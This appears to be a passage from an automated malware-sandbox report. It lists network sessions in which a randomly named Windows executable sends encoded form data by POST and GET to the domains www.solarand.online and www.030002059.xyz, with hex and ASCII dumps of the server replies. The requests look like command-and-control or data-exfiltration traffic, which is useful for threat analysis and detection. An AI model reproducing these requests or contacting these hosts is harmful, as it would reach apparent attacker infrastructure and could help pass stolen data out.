                                                                        Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                        Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                        Dec 13, 2024 13:10:04.777553082 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                        Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.450040217.160.0.60805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:06.165910006 CET10878OUTPOST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 45 6c 6a 57 76 55 31 78 5a 6b 50 32 6c 74 78 79 6f 71 6f 72 77 34 49 4c 51 55 49 76 4b 72 42 73 79 36 39 2f 64 41 61 58 30 7a 50 52 4f 76 59 2b 4f 62 6e 64 47 30 6b 51 6e 4f 66 75 6e 7a 59 75 65 55 31 59 50 31 32 68 37 37 2b 67 2b 51 36 52 77 6a 6a 78 43 51 6a 38 33 75 37 52 70 4d 32 55 2b 4f 72 6e 55 30 46 54 2f 76 64 68 54 5a 6b 6d 76 32 46 59 4f 6f 36 2f 36 45 30 36 5a 73 67 74 49 68 44 6b 6a 73 61 77 5a 4d 79 49 7a 44 79 72 41 76 58 51 67 55 77 57 62 36 54 50 44 58 76 59 71 36 41 36 62 47 70 4e 65 5a 5a 38 4b 68 74 58 6a 6a 68 63 73 55 57 72 71 79 64 45 50 33 57 53 4c 7a 38 57 6d 64 4d 64 4d 63 33 2b 51 64 70 57 48 71 2b 70 65 33 76 75 54 7a 35 31 43 79 78 72 69 67 46 4a 79 58 67 56 77 4a 68 39 49 4a 57 69 6f 70 67 51 51 55 35 37 4f 58 5a 6f 4e 38 44 46 66 4e 6b 44 62 66 64 6b 59 6f 52 43 30 76 6f 67 2f 2f 4c 36 31 6b 69 45 6f 2b 62 55 67 38 79 41 42 41 6c 30 54 49 34 55 49 70 64 68 55 43 6d 5a 47 77 57 47 52 69 45 77 46 4d 45 59 76 44 39 30 78 78 4c 44 67 6a 42 44 47 69 4a [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2ltxyoqorw4ILQUIvKrBsy69/dAaX0zPROvY+ObndG0kQnOfunzYueU1YP12h77+g+Q6RwjjxCQj83u7RpM2U+OrnU0FT/vdhTZkmv2FYOo6/6E06ZsgtIhDkjsawZMyIzDyrAvXQgUwWb6TPDXvYq6A6bGpNeZZ8KhtXjjhcsUWrqydEP3WSLz8WmdMdMc3+QdpWHq+pe3vuTz51CyxrigFJyXgVwJh9IJWiopgQQU57OXZoN8DFfNkDbfdkYoRC0vog//L61kiEo+bUg8yABAl0TI4UIpdhUCmZGwWGRiEwFMEYvD90xxLDgjBDGiJAYKpNTBKjfNl4sj6Xa+gb5PazirCW1k387ouakND45tzSLwGCBvZnvyW+MEtScahyh8IGSDr/hhENfj0dFofvCplM8231/FNfmxrR2AqkeDMH1ZsQYqvvMZtydyqfu9YLGn/+CAW5HieC12lWgTcDiKFBDqkBynTccWvPFslAlZpeDNwWR7qLkE49XdSgKUkHaklh0VhK9/nmCsN7TLXGxQCRG9C5s5dQeFBIkDOVlCRqu/maSPeHIb/eZcryM5MkFfDs3IFFA/ixcNwC4D8I1PHiJ/8erUcyNTGVd4ytgDVUsOLWQ8QcP7w46psHrNnhX2qR/gA+0WWkBUH3J+EPW8+HoNI/kdl8NqzX2xhtD0EF1USKmknZXIQTi+/7yQjxrOcBrgryaeF/X8wy2R3jSTmKsLrk6O9w22X0yNKsGeZ8QI0729IIqkEJpg9w/7atYxvdfOANys+W+1eqhc7OoVqgYjdhRaja8S2aBAp1TW0V7+4d4VS0RDGIKUSBlKwl4XqncuIR5EYsl+Qy4sbVEDu+zekKL7/7F7DVhv4YQZvFwfU0a8WfoYcNKw6WJ78jxa4G3/rxChQBwpgIl0YPve26ph+azlcbuTda9CUx2P2is85u812RgRmmuxyh/v7t+4iJP88//E3eOJKlYjI0nyyrQr91D2axL [TRUNCATED]
                                                                        Dec 13, 2024 13:10:07.610346079 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:07 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                        Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                        Dec 13, 2024 13:10:07.610388041 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                        Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.450041217.160.0.60805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:08.819462061 CET514OUTGET /tycs/?9B_ppt=JnL2shJTRGPmh49fpIgYgN5+UFlzCIkQlKFRWx+imQO/VZY5IL7EOXQuybzppj9USUhCNE2Oi8OvmQ7twQzrLnOW74Dzktiy3u2kYAFK0p92dbQcp3RrNNk=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:10:10.090229034 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 4545
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:09 GMT
                                                                        Server: Apache
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                        Dec 13, 2024 13:10:10.090253115 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                        Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                        Dec 13, 2024 13:10:10.090269089 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                        Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                        Dec 13, 2024 13:10:10.090286970 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                        Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.450042161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:15.841300964 CET770OUTPOST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 68 67 51 63 51 6f 69 6e 63 76 46 42 76 2b 46 49 4a 6f 31 30 2b 52 2b 5a 6d 32 57 46 35 72 78 51 30 7a 6f 48 38 30 67 41 65 39 75 78 6e 4b 78 6a 61 6e 63 6c 44 44 38 56 36 6a 33 79 55 55 68 6f 6c 46 61 31 34 68 4f 44 49 55 68 6e 68 66 58 65 62 79 51 2f 49 32 73 4b 77 76 46 77 6e 78 41 47 34 66 68 58 73 4d 74 77 51 77 58 53 62 33 6c 48 62 4d 46 7a 48 46 4f 74 76 78 4e 63 68 65 73 6b 30 6a 51 30 2b 6c 77 5a 6e 74 44 56 71 52 36 63 66 43 57 61 30 53 45 38 49 32 41 37 71 37 7a 57 71 59 63 33 4d 31 59 64 71 41 35 67 33 4a 77 44 43 65 51 6e 64 67 3d 3d
                                                                        Data Ascii: 9B_ppt=v6Q8cfNtGstVhgQcQoincvFBv+FIJo10+R+Zm2WF5rxQ0zoH80gAe9uxnKxjanclDD8V6j3yUUholFa14hODIUhnhfXebyQ/I2sKwvFwnxAG4fhXsMtwQwXSb3lHbMFzHFOtvxNchesk0jQ0+lwZntDVqR6cfCWa0SE8I2A7q7zWqYc3M1YdqA5g3JwDCeQndg==
                                                                        Dec 13, 2024 13:10:17.022445917 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:16 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:10:17.022486925 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.450043161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:19.085571051 CET790OUTPOST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 67 41 67 63 54 50 57 6e 65 50 46 43 78 4f 46 49 66 59 31 77 2b 51 43 5a 6d 79 48 49 35 5a 46 51 36 32 55 48 75 68 4d 41 64 39 75 78 30 4b 77 6e 65 6e 63 2b 44 44 68 71 36 6a 4c 79 55 55 31 6f 6c 46 4b 31 34 57 79 41 48 6b 68 6c 70 2f 58 59 56 53 51 2f 49 32 73 4b 77 76 52 61 6e 77 6f 47 34 4f 78 58 71 64 74 7a 64 51 58 52 4d 48 6c 48 4b 63 46 2f 48 46 4f 50 76 79 4a 36 68 64 55 6b 30 69 67 30 2f 77 63 61 79 39 44 58 31 68 36 44 51 33 72 65 7a 53 42 77 4f 58 45 38 30 76 44 4c 69 2b 52 74 64 45 35 4b 34 41 64 54 71 4f 35 33 50 64 74 75 47 6c 37 71 59 4f 32 39 73 79 6d 77 48 78 43 67 66 78 6f 57 62 63 59 3d
                                                                        Data Ascii: 9B_ppt=v6Q8cfNtGstVgAgcTPWnePFCxOFIfY1w+QCZmyHI5ZFQ62UHuhMAd9ux0Kwnenc+DDhq6jLyUU1olFK14WyAHkhlp/XYVSQ/I2sKwvRanwoG4OxXqdtzdQXRMHlHKcF/HFOPvyJ6hdUk0ig0/wcay9DX1h6DQ3rezSBwOXE80vDLi+RtdE5K4AdTqO53PdtuGl7qYO29symwHxCgfxoWbcY=
                                                                        Dec 13, 2024 13:10:19.888510942 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:19 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
